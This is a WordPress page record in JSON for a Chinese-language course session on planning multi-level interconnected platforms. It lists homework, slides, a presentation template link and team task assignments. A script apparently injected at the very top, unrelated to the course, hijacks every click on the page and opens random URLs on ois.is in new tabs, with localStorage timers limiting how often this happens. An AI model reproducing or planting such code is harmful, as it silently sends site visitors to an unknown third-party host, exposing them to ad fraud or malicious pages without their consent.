<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":893,"date":"2014-10-11T11:39:41","date_gmt":"2014-10-11T03:39:41","guid":{"rendered":"http:\/\/edu.secda.info\/phil999_course02\/?page_id=893"},"modified":"2020-02-20T18:43:32","modified_gmt":"2020-02-20T10:43:32","slug":"%e7%ac%ac%e5%8d%81%e9%80%b1-%e5%a4%9a%e5%b1%a4%e7%b4%9a%e4%ba%92%e8%81%af%e5%b9%b3%e5%8f%b0%e8%a6%8f%e5%8a%83","status":"publish","type":"page","link":"https:\/\/edu.secda.info\/phil999_course02\/?page_id=893","title":{"rendered":"\u7b2c\u5341\u9031 \u591a\u5c64\u7d1a\u4e92\u806f\u5e73\u53f0\u898f\u5283"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"893\" class=\"elementor elementor-893\" data-elementor-settings=\"[]\">\r\n\t\t\t\t\t\t<div class=\"elementor-inner\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-section-wrap\">\r\n\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6a6c2d8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"6a6c2d8\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-14f8b8e\" data-id=\"14f8b8e\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-31a5dc9 elementor-widget elementor-widget-heading\" data-id=\"31a5dc9\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u524d\u6e96\u5099<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-c4af27c elementor-widget elementor-widget-accordion\" data-id=\"c4af27c\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2061\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-2061\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u4f5c\u696d<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2061\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2061\"><p><span style=\"color: #000000;\">\u5b8c\u6210\u8a2d\u8a083.\u591a\u5c64\u7d1a\u4e92\u806f\u5e73\u53f0\u7d50\u69cb<\/span><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a6dca57 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a6dca57\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4fc4882\" data-id=\"4fc4882\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4858df4 elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"4858df4\" data-element_type=\"widget\" data-widget_type=\"divider.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-divider\">\r\n\t\t\t<span class=\"elementor-divider-separator\">\r\n\t\t\t\t\t\t<\/span>\r\n\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4ebfa3e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4ebfa3e\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8a76086\" data-id=\"8a76086\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-db3d2c3 elementor-widget elementor-widget-heading\" data-id=\"db3d2c3\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u4e0a\u8ab2\u7d00\u9304<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-3b3142d elementor-widget elementor-widget-accordion\" data-id=\"3b3142d\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-6201\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-6201\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u8ab2\u5802\u8b1b\u7fa9<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-6201\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-6201\"><p>[wonderplugin_pdf src=&#8221;\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/week10.pdf&#8221; width=&#8221;100%&#8221; height=&#8221;600px&#8221; style=&#8221;border:0;&#8221;]<\/p><h6>\u671f\u672b\u7c21\u5831\u7bc4\u672c\u4e0b\u8f09\u3000<a href=\"https:\/\/drive.google.com\/file\/d\/1YqpcvvppGE5gCRddnqen6u2juQ8GnGbL\/view?usp=sharing\" target=\"_blank\" rel=\"noopener\">https:\/\/drive.google.com\/file\/d\/1YqpcvvppGE5gCRddnqen6u2juQ8GnGbL\/view?usp=sharing<\/a><\/h6><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-949fa2a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"949fa2a\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-52bbc7c\" data-id=\"52bbc7c\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d842463 elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"d842463\" data-element_type=\"widget\" data-widget_type=\"divider.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-divider\">\r\n\t\t\t<span class=\"elementor-divider-separator\">\r\n\t\t\t\t\t\t<\/span>\r\n\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d2e8b5e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d2e8b5e\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8dc0794\" data-id=\"8dc0794\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d59b511 elementor-widget elementor-widget-heading\" data-id=\"d59b511\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u5f8c\u5b78\u7fd2\u5831\u544a<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-911f659 elementor-widget elementor-widget-accordion\" data-id=\"911f659\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1521\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-1521\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u4f5c\u696d<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1521\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1521\"><p>\uff11\uff11\uff0f\uff11\uff18\u65e5\u4e2d\u5348\uff11\uff12\u9ede\u524d\uff0c\u4e0a\u50b3\u5718\u968a\u4f5c\u696d\u6700\u65b0\u9032\u5ea6\uff08\u5b8c\u62103.\u5e73\u53f0\u7d50\u69cb\uff09<\/p><p>\u5e73\u53f0\u8a2d\u8a08\u53c3\u8003\u7db2\u5740 :<\/p><p><strong>\u4e3b\u5e73\u53f0 :\u00a0<\/strong><\/p><p><a href=\"http:\/\/www.kt-house.com.tw\/\" target=\"_blank\" rel=\"noopener\">http:\/\/www.kt-house.com.tw\/<\/a><\/p><p><a href=\"http:\/\/www.buyegg.com.tw\/\" target=\"_blank\" rel=\"noopener\">http:\/\/www.buyegg.com.tw\/<\/a><\/p><p><a href=\"http:\/\/si.secda.info\/bsa_taipei\/\" target=\"_blank\" rel=\"noopener\">http:\/\/si.secda.info\/bsa_taipei\/<\/a><\/p><p><strong>\u76ee\u6a19\u5ba2\u7fa4\u5e73\u53f0(\u5408\u4f5c\u5925\u4f34\u6216\u9867\u5ba2) : <\/strong><\/p><p>\u5c0b\u627e\u771f\u5be6\u5b58\u5728\u7684\u5e97\u5bb6\/\u9054\u4eba\u4f5c\u70ba\u6a21\u64ec\u6848\u4f8b<\/p><p>\u5728\u8a2d\u8a08\u904e\u7a0b\u4e2d\uff0c\u60f3\u60f3\u5c0d\u65b9\u70ba\u751a\u9ebc\u9700\u8981\u64c1\u6709\u5c08\u5c6c\u7684\u5e73\u53f0\uff0c\u4ed6\u53ef\u4ee5\u62ff\u4f86\u505a\u751a\u9ebc\uff0c\u5c0d\u4ed6\u5011\u6709\u4f55\u610f\u7fa9? \u5c31\u50cf\u8001\u5e2b\u63e3\u6469\u5b78\u751f\u70ba\u4f55\u9700\u8981\u500b\u4eba\u5c08\u5c6c\u5e73\u53f0\uff0c\u624d\u8a2d\u8a08\u5e73\u53f0\u9078\u55ae<\/p><p>1.\u53ef\u53c3\u8003\u65e2\u6709\u5e97\u5bb6\u5c08\u5c6c\u7db2\u7ad9<\/p><p>2.\u6216\u63e3\u6469\u5c0d\u65b9\u9700\u8981\u54ea\u4e9b\u9700\u6c42<\/p><hr \/><p>\u671f\u672b\u7c21\u5831\u7bc4\u672c\u4e0b\u8f09\u3000<a href=\"https:\/\/drive.google.com\/file\/d\/1YqpcvvppGE5gCRddnqen6u2juQ8GnGbL\/view?usp=sharing\" target=\"_blank\" rel=\"noopener\">https:\/\/drive.google.com\/file\/d\/1YqpcvvppGE5gCRddnqen6u2juQ8GnGbL\/view?usp=sharing<\/a><\/p><p>\u63a5\u4e0b\u4f86\u5e7e\u5468\u662f\u5c07\u540c\u5b78\u7684\u6982\u5ff5\u8f49\u5316\u70ba\u5be6\u969b\u89e3\u6c7a\u65b9\u6848<br \/>\u6bcf\u7d44\u53ef\u958b\u59cb\u5206\u5de5<br \/>1. \u8ca0\u8cac\u5efa\u7f6e&#8221;\u4e3b\u5e73\u53f0&#8221;(\u7d44\u7e54\u5e73\u53f0)<br \/>2.\u8ca0\u8cac\u5efa\u7f6e&#8221;\u5408\u4f5c\u5925\u4f34&#8221;\/&#8221;\u9867\u5ba2\u5e73\u53f0&#8221;<br \/>3.\u8ca0\u8cac\u64b0\u5beb\u5e73\u53f0\u6240\u9700\u5167\u5bb9<br \/>4.\u8ca0\u8cac\u5efa\u7f6e\u96fb\u5b50\u5546\u52d9\uff0c\u5546\u54c1\u4e0a\u67b6(\u5546\u54c1\u7167\/\u8cc7\u8a0a)<br \/>5.\u8ca0\u8cac\u6e96\u5099\u6210\u679c\u7c21\u5831\u5167\u5bb9<br \/>6.\u5404\u81ea\u5b78\u751f\u500b\u4eba\u5e73\u53f0\u9700\u8981\u5efa\u7f6e(\u7576\u4f5c\u5408\u4f5c\u5925\u4f34)<\/p><p>\u5718\u968a\u4f5c\u696d\u96f2\u7aef\u7a7a\u9593\u53ef\u63d0\u4f9b\u540c\u5b78\u5132\u5b58\u76f8\u95dc\u5e73\u53f0\u5efa\u7f6e\u8cc7\u6599<\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u8ab2\u524d\u6e96\u5099 \u4f5c\u696d \u5b8c\u6210\u8a2d\u8a083.\u591a\u5c64\u7d1a\u4e92\u806f\u5e73\u53f0\u7d50\u69cb \u4e0a\u8ab2\u7d00\u9304 \u8ab2\u5802\u8b1b\u7fa9 \u671f\u672b\u7c21\u5831\u7bc4\u672c<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":853,"menu_order":10,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0},"_links":{"self":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/893"}],"collection":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=893"}],"version-history":[{"count":8,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/893\/revisions"}],"predecessor-version":[{"id":1567,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/893\/revisions\/1567"}],"up":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/853"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=893"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}